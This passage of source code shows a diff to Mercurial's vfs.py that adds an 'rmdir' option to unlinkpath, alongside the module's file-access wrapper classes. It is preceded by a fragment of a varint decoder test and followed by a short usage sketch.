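        # byte arrives with the continuation bit cleared
        result = shift = 0
        while True:
            data = fh.read(1)
            if not data:
                raise EOFError('stream ended unexpectedly')
            byte = data[0]
            result |= (byte & 0x7f) << shift
            if not byte & 0x80:
                return result
            shift += 7

    for n in (0, 1, 127, 1337, 65536):
        assert decode_uvarint(io.BytesIO(encode_uvarint(n))) == n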
@@ -1,652 +1,653 b''
# vfs.py - Mercurial 'vfs' classes
#
# Copyright Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import

import contextlib
import errno
import os
import shutil
import stat
import threading

from .i18n import _
from . import (
    encoding,
    error,
    pathutil,
    pycompat,
    util,
)

def _avoidambig(path, oldstat):
    """Avoid file stat ambiguity forcibly

    This function copies the ``path`` file if it is owned by another
    user (see issue5418 and issue5584 for detail).
    """
    def checkandavoid():
        newstat = util.filestat.frompath(path)
        # return whether file stat ambiguity is (already) avoided
        return (not newstat.isambig(oldstat) or
                newstat.avoidambig(path, oldstat))
    if not checkandavoid():
        # simply copy to change owner of path to get privilege to
        # advance mtime (see issue5418)
        util.rename(util.mktempcopy(path), path)
        checkandavoid()

class abstractvfs(object):
    """Abstract base class; cannot be instantiated"""

    def __init__(self, *args, **kwargs):
        '''Prevent instantiation; don't call this from subclasses.'''
        raise NotImplementedError('attempted instantiating ' + str(type(self)))

    def tryread(self, path):
        '''gracefully return an empty string for missing files'''
        try:
            return self.read(path)
        except IOError as inst:
            if inst.errno != errno.ENOENT:
                raise
        return ""

    def tryreadlines(self, path, mode='rb'):
        '''gracefully return an empty array for missing files'''
        try:
            return self.readlines(path, mode=mode)
        except IOError as inst:
            if inst.errno != errno.ENOENT:
                raise
        return []

    @util.propertycache
    def open(self):
        '''Open ``path`` file, which is relative to vfs root.

        Newly created directories are marked as "not to be indexed by
        the content indexing service", if ``notindexed`` is specified
        for "write" mode access.
        '''
        return self.__call__

    def read(self, path):
        with self(path, 'rb') as fp:
            return fp.read()

    def readlines(self, path, mode='rb'):
        with self(path, mode=mode) as fp:
            return fp.readlines()

    def write(self, path, data, backgroundclose=False, **kwargs):
        with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
            return fp.write(data)

    def writelines(self, path, data, mode='wb', notindexed=False):
        with self(path, mode=mode, notindexed=notindexed) as fp:
            return fp.writelines(data)

    def append(self, path, data):
        with self(path, 'ab') as fp:
            return fp.write(data)

    def basename(self, path):
        """return base element of a path (as os.path.basename would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.basename(path)

    def chmod(self, path, mode):
        return os.chmod(self.join(path), mode)

    def dirname(self, path):
        """return dirname element of a path (as os.path.dirname would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.dirname(path)

    def exists(self, path=None):
        return os.path.exists(self.join(path))

    def fstat(self, fp):
        return util.fstat(fp)

    def isdir(self, path=None):
        return os.path.isdir(self.join(path))

    def isfile(self, path=None):
        return os.path.isfile(self.join(path))

    def islink(self, path=None):
        return os.path.islink(self.join(path))

    def isfileorlink(self, path=None):
        '''return whether path is a regular file or a symlink

        Unlike isfile, this doesn't follow symlinks.'''
        try:
            st = self.lstat(path)
        except OSError:
            return False
        mode = st.st_mode
        return stat.S_ISREG(mode) or stat.S_ISLNK(mode)

    def reljoin(self, *paths):
        """join various elements of a path together (as os.path.join would do)

        The vfs base is not injected so that paths stay relative. This exists
        to allow handling of strange encoding if needed."""
        return os.path.join(*paths)

    def split(self, path):
        """split top-most element of a path (as os.path.split would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.split(path)

    def lexists(self, path=None):
        return os.path.lexists(self.join(path))

    def lstat(self, path=None):
        return os.lstat(self.join(path))

    def listdir(self, path=None):
        return os.listdir(self.join(path))

    def makedir(self, path=None, notindexed=True):
        return util.makedir(self.join(path), notindexed)

    def makedirs(self, path=None, mode=None):
        return util.makedirs(self.join(path), mode)

    def makelock(self, info, path):
        return util.makelock(info, self.join(path))

    def mkdir(self, path=None):
        return os.mkdir(self.join(path))

    def mkstemp(self, suffix='', prefix='tmp', dir=None):
        fd, name = pycompat.mkstemp(suffix=suffix, prefix=prefix,
                                    dir=self.join(dir))
        dname, fname = util.split(name)
        if dir:
            return fd, os.path.join(dir, fname)
        else:
            return fd, fname

    def readdir(self, path=None, stat=None, skip=None):
        return util.listdir(self.join(path), stat, skip)

    def readlock(self, path):
        return util.readlock(self.join(path))

    def rename(self, src, dst, checkambig=False):
        """Rename from src to dst

        checkambig argument is used with util.filestat, and is useful
        only if the destination file is guarded by a lock
        (e.g. repo.lock or repo.wlock).

        To avoid file stat ambiguity forcibly, checkambig=True involves
        copying the ``src`` file if it is owned by another user. Therefore,
        use checkambig=True only in limited cases (see also issue5418 and
        issue5584 for detail).
        """
        srcpath = self.join(src)
        dstpath = self.join(dst)
        oldstat = checkambig and util.filestat.frompath(dstpath)
        if oldstat and oldstat.stat:
            ret = util.rename(srcpath, dstpath)
            _avoidambig(dstpath, oldstat)
            return ret
        return util.rename(srcpath, dstpath)

    def readlink(self, path):
        return os.readlink(self.join(path))

    def removedirs(self, path=None):
        """Remove a leaf directory and all empty intermediate ones
        """
        return util.removedirs(self.join(path))

    def rmtree(self, path=None, ignore_errors=False, forcibly=False):
        """Remove a directory tree recursively

        If ``forcibly``, this tries to remove READ-ONLY files, too.
        """
        if forcibly:
            def onerror(function, path, excinfo):
                if function is not os.remove:
                    raise
                # read-only files cannot be unlinked under Windows
                s = os.stat(path)
                if (s.st_mode & stat.S_IWRITE) != 0:
                    raise
                os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
                os.remove(path)
        else:
            onerror = None
        return shutil.rmtree(self.join(path),
                             ignore_errors=ignore_errors, onerror=onerror)

    def setflags(self, path, l, x):
        return util.setflags(self.join(path), l, x)

    def stat(self, path=None):
        return os.stat(self.join(path))

    def unlink(self, path=None):
        return util.unlink(self.join(path))

    def tryunlink(self, path=None):
        """Attempt to remove a file, ignoring missing file errors."""
        util.tryunlink(self.join(path))

-    def unlinkpath(self, path=None, ignoremissing=False):
-        return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
+    def unlinkpath(self, path=None, ignoremissing=False, rmdir=True):
+        return util.unlinkpath(self.join(path), ignoremissing=ignoremissing,
+                               rmdir=rmdir)

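    # A minimal usage sketch of the new ``rmdir`` flag (hypothetical paths;
    # per this change, util.unlinkpath prunes empty parent directories
    # unless rmdir is False):
    #
    #     v = vfs('/tmp/wc')                        # hypothetical root
    #     v.write('somedir/foo', b'hi')             # creates somedir/ as needed
    #     v.unlinkpath('somedir/foo')               # somedir/ removed if empty
    #     v.write('somedir/foo', b'hi')
    #     v.unlinkpath('somedir/foo', rmdir=False)  # somedir/ left in place
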
    def utime(self, path=None, t=None):
        return os.utime(self.join(path), t)

    def walk(self, path=None, onerror=None):
        """Yield (dirpath, dirs, files) tuple for each directory under path

        ``dirpath`` is relative to the root of this vfs. This uses
        ``os.sep`` as the path separator, even if you specify a POSIX
        style ``path``.

        "The root of this vfs" is represented as empty ``dirpath``.
        """
        root = os.path.normpath(self.join(None))
        # when dirpath == root, dirpath[prefixlen:] becomes empty
        # because len(dirpath) < prefixlen.
        prefixlen = len(pathutil.normasprefix(root))
        for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
            yield (dirpath[prefixlen:], dirs, files)

    @contextlib.contextmanager
    def backgroundclosing(self, ui, expectedcount=-1):
        """Allow files to be closed asynchronously.

        When this context manager is active, ``backgroundclose`` can be passed
        to ``__call__``/``open`` to result in the file possibly being closed
        asynchronously, on a background thread.
        """
        # Sharing backgroundfilecloser between threads is complex, and using
        # multiple instances puts us at risk of running out of file
        # descriptors, so only allow use of backgroundfilecloser from the
        # main thread.
        if not isinstance(threading.currentThread(), threading._MainThread):
            yield
            return
        vfs = getattr(self, 'vfs', self)
        if getattr(vfs, '_backgroundfilecloser', None):
            raise error.Abort(
                _('can only have 1 active background file closer'))

        with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
            try:
                vfs._backgroundfilecloser = bfc
                yield bfc
            finally:
                vfs._backgroundfilecloser = None

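# A sketch of how the background-closing pieces above fit together (assumes
# a ui object and a worker.backgroundclose configuration that enables it):
#
#     with somevfs.backgroundclosing(ui, expectedcount=len(files)):
#         for name, data in files:
#             with somevfs(name, 'wb', backgroundclose=True) as fp:
#                 fp.write(data)
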
class vfs(abstractvfs):
    '''Operate files relative to a base directory

    This class is used to hide the details of COW semantics and
    remote file access from higher level code.

    'cacheaudited' should be enabled only if (a) the vfs object is short-lived,
    or (b) the base directory is managed by hg and considered sort-of
    append-only. See pathutil.pathauditor() for details.
    '''
    def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
                 realpath=False):
        if expandpath:
            base = util.expandpath(base)
        if realpath:
            base = os.path.realpath(base)
        self.base = base
        self._audit = audit
        if audit:
            self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
        else:
            self.audit = (lambda path, mode=None: True)
        self.createmode = None
        self._trustnlink = None

    @util.propertycache
    def _cansymlink(self):
        return util.checklink(self.base)

    @util.propertycache
    def _chmod(self):
        return util.checkexec(self.base)

    def _fixfilemode(self, name):
        if self.createmode is None or not self._chmod:
            return
        os.chmod(name, self.createmode & 0o666)

    def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
                 backgroundclose=False, checkambig=False, auditpath=True):
        '''Open ``path`` file, which is relative to vfs root.

        Newly created directories are marked as "not to be indexed by
        the content indexing service", if ``notindexed`` is specified
        for "write" mode access.

        If ``backgroundclose`` is passed, the file may be closed asynchronously.
        It can only be used if the ``self.backgroundclosing()`` context manager
        is active. This should only be specified if the following criteria hold:

        1. There is a potential for writing thousands of files. Unless you
           are writing thousands of files, the performance benefits of
           asynchronously closing files are not realized.
        2. Files are opened exactly once for the ``backgroundclosing``
           active duration and are therefore free of race conditions between
           closing a file on a background thread and reopening it. (If the
           file were opened multiple times, there could be unflushed data
           because the original file handle hasn't been flushed/closed yet.)

        The ``checkambig`` argument is passed to atomictempfile (valid
        only for writing), and is useful only if the target file is
        guarded by a lock (e.g. repo.lock or repo.wlock).

        To avoid file stat ambiguity forcibly, checkambig=True involves
        copying the ``path`` file opened in "append" mode (e.g. for
        truncation) if it is owned by another user. Therefore, use the
        combination of append mode and checkambig=True only in limited
        cases (see also issue5418 and issue5584 for detail).
        '''
        if auditpath:
            if self._audit:
                r = util.checkosfilename(path)
                if r:
                    raise error.Abort("%s: %r" % (r, path))
            self.audit(path, mode=mode)
        f = self.join(path)

        if "b" not in mode:
            mode += "b" # for that other OS

        nlink = -1
        if mode not in ('r', 'rb'):
            dirname, basename = util.split(f)
            # If basename is empty, then the path is malformed because it
            # points to a directory. Let the posixfile() call below raise
            # IOError.
            if basename:
                if atomictemp:
                    util.makedirs(dirname, self.createmode, notindexed)
                    return util.atomictempfile(f, mode, self.createmode,
                                               checkambig=checkambig)
                try:
                    if 'w' in mode:
                        util.unlink(f)
                        nlink = 0
                    else:
                        # nlinks() may behave differently for files on Windows
                        # shares if the file is open.
                        with util.posixfile(f):
                            nlink = util.nlinks(f)
                            if nlink < 1:
                                nlink = 2 # force mktempcopy (issue1922)
                except (OSError, IOError) as e:
                    if e.errno != errno.ENOENT:
                        raise
                    nlink = 0
                    util.makedirs(dirname, self.createmode, notindexed)
                if nlink > 0:
                    if self._trustnlink is None:
                        self._trustnlink = nlink > 1 or util.checknlink(f)
                    if nlink > 1 or not self._trustnlink:
                        util.rename(util.mktempcopy(f), f)
        fp = util.posixfile(f, mode)
        if nlink == 0:
            self._fixfilemode(f)

        if checkambig:
            if mode in ('r', 'rb'):
                raise error.Abort(_('implementation error: mode %s is not'
                                    ' valid for checkambig=True') % mode)
            fp = checkambigatclosing(fp)

        if (backgroundclose and
            isinstance(threading.currentThread(), threading._MainThread)):
            if not self._backgroundfilecloser:
                raise error.Abort(_('backgroundclose can only be used when a '
                                    'backgroundclosing context manager is active')
                                  )

            fp = delayclosedfile(fp, self._backgroundfilecloser)

        return fp

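    # Example of the write-path options above (hypothetical file name;
    # checkambig is only meaningful while the target is lock-guarded):
    #
    #     with self('somefile', 'wb', atomictemp=True, checkambig=True) as fp:
    #         fp.write(data)
    #
    # atomictemp routes the write through util.atomictempfile, so readers
    # never observe a partially written file.
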
    def symlink(self, src, dst):
        self.audit(dst)
        linkname = self.join(dst)
        util.tryunlink(linkname)

        util.makedirs(os.path.dirname(linkname), self.createmode)

        if self._cansymlink:
            try:
                os.symlink(src, linkname)
            except OSError as err:
                raise OSError(err.errno, _('could not symlink to %r: %s') %
                              (src, encoding.strtolocal(err.strerror)),
                              linkname)
        else:
            self.write(dst, src)

    def join(self, path, *insidef):
        if path:
            return os.path.join(self.base, path, *insidef)
        else:
            return self.base

opener = vfs

class proxyvfs(object):
    def __init__(self, vfs):
        self.vfs = vfs

    @property
    def options(self):
        return self.vfs.options

    @options.setter
    def options(self, value):
        self.vfs.options = value

class filtervfs(abstractvfs, proxyvfs):
    '''Wrapper vfs for filtering filenames with a function.'''

    def __init__(self, vfs, filter):
        proxyvfs.__init__(self, vfs)
        self._filter = filter

    def __call__(self, path, *args, **kwargs):
        return self.vfs(self._filter(path), *args, **kwargs)

    def join(self, path, *insidef):
        if path:
            return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
        else:
            return self.vfs.join(path)

filteropener = filtervfs

class readonlyvfs(abstractvfs, proxyvfs):
    '''Wrapper vfs preventing any writing.'''

    def __init__(self, vfs):
        proxyvfs.__init__(self, vfs)

    def __call__(self, path, mode='r', *args, **kw):
        if mode not in ('r', 'rb'):
            raise error.Abort(_('this vfs is read only'))
        return self.vfs(path, mode, *args, **kw)

    def join(self, path, *insidef):
        return self.vfs.join(path, *insidef)

class closewrapbase(object):
    """Base class for wrappers that hook closing

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh):
        object.__setattr__(self, r'_origfh', fh)

    def __getattr__(self, attr):
        return getattr(self._origfh, attr)

    def __setattr__(self, attr, value):
        return setattr(self._origfh, attr, value)

    def __delattr__(self, attr):
        return delattr(self._origfh, attr)

    def __enter__(self):
        return self._origfh.__enter__()

    def __exit__(self, exc_type, exc_value, exc_tb):
        raise NotImplementedError('attempted instantiating ' + str(type(self)))

    def close(self):
        raise NotImplementedError('attempted instantiating ' + str(type(self)))

class delayclosedfile(closewrapbase):
    """Proxy for a file object whose close is delayed.

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh, closer):
        super(delayclosedfile, self).__init__(fh)
        object.__setattr__(self, r'_closer', closer)

    def __exit__(self, exc_type, exc_value, exc_tb):
        self._closer.close(self._origfh)

    def close(self):
        self._closer.close(self._origfh)

class backgroundfilecloser(object):
    """Coordinates background closing of file handles on multiple threads."""
    def __init__(self, ui, expectedcount=-1):
        self._running = False
        self._entered = False
        self._threads = []
        self._threadexception = None

        # Only Windows/NTFS has slow file closing. So only enable by default
        # on that platform. But allow it to be enabled elsewhere for testing.
        defaultenabled = pycompat.iswindows
        enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)

        if not enabled:
            return

        # There is overhead to starting and stopping the background threads.
        # Don't do background processing unless the file count is large enough
        # to justify it.
        minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
        # FUTURE dynamically start background threads after minfilecount closes.
        # (We don't currently have any callers that don't know their file count)
        if expectedcount > 0 and expectedcount < minfilecount:
            return

        maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
        threadcount = ui.configint('worker', 'backgroundclosethreadcount')

        ui.debug('starting %d threads for background file closing\n' %
                 threadcount)

        self._queue = pycompat.queue.Queue(maxsize=maxqueue)
        self._running = True

        for i in range(threadcount):
            t = threading.Thread(target=self._worker, name='backgroundcloser')
            self._threads.append(t)
            t.start()

    def __enter__(self):
        self._entered = True
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        self._running = False

        # Wait for threads to finish closing so open files don't linger for
        # longer than the lifetime of the context manager.
        for t in self._threads:
            t.join()

    def _worker(self):
        """Main routine for worker thread."""
        while True:
            try:
                fh = self._queue.get(block=True, timeout=0.100)
                # Need to catch errors or the thread will terminate and
                # we could orphan file descriptors.
                try:
                    fh.close()
                except Exception as e:
                    # Stash so we can re-raise from the main thread later.
                    self._threadexception = e
            except pycompat.queue.Empty:
                if not self._running:
                    break

    def close(self, fh):
        """Schedule a file for closing."""
        if not self._entered:
            raise error.Abort(_('can only call close() when context manager '
                                'active'))

        # If a background thread encountered an exception, raise now so we fail
        # fast. Otherwise we may potentially go on for minutes until the error
        # is acted on.
        if self._threadexception:
            e = self._threadexception
            self._threadexception = None
            raise e

        # If we're not actively running, close synchronously.
        if not self._running:
            fh.close()
            return

        self._queue.put(fh, block=True, timeout=None)

class checkambigatclosing(closewrapbase):
    """Proxy for a file object, to avoid ambiguity of file stat

    See also util.filestat for detail about "ambiguity of file stat".

    This proxy is useful only if the target file is guarded by a
    lock (e.g. repo.lock or repo.wlock)

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh):
        super(checkambigatclosing, self).__init__(fh)
        object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))

    def _checkambig(self):
        oldstat = self._oldstat
        if oldstat.stat:
            _avoidambig(self._origfh.name, oldstat)

    def __exit__(self, exc_type, exc_value, exc_tb):
        self._origfh.__exit__(exc_type, exc_value, exc_tb)
        self._checkambig()

    def close(self):
        self._origfh.close()
        self._checkambig()
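
A short sketch of the wrapper classes, assuming a scratch directory and
hypothetical file names:

    from mercurial import error, vfs as vfsmod

    v = vfsmod.vfs('/tmp/scratch')
    v.write('data.txt', b'payload')

    ro = vfsmod.readonlyvfs(v)
    assert ro.read('data.txt') == b'payload'
    try:
        ro('data.txt', 'wb')
    except error.Abort:
        pass                        # any non-read mode is rejected

    lower = vfsmod.filtervfs(v, lambda p: p.lower())
    lower.write('DATA2.TXT', b'x')  # stored as data2.txt via the filter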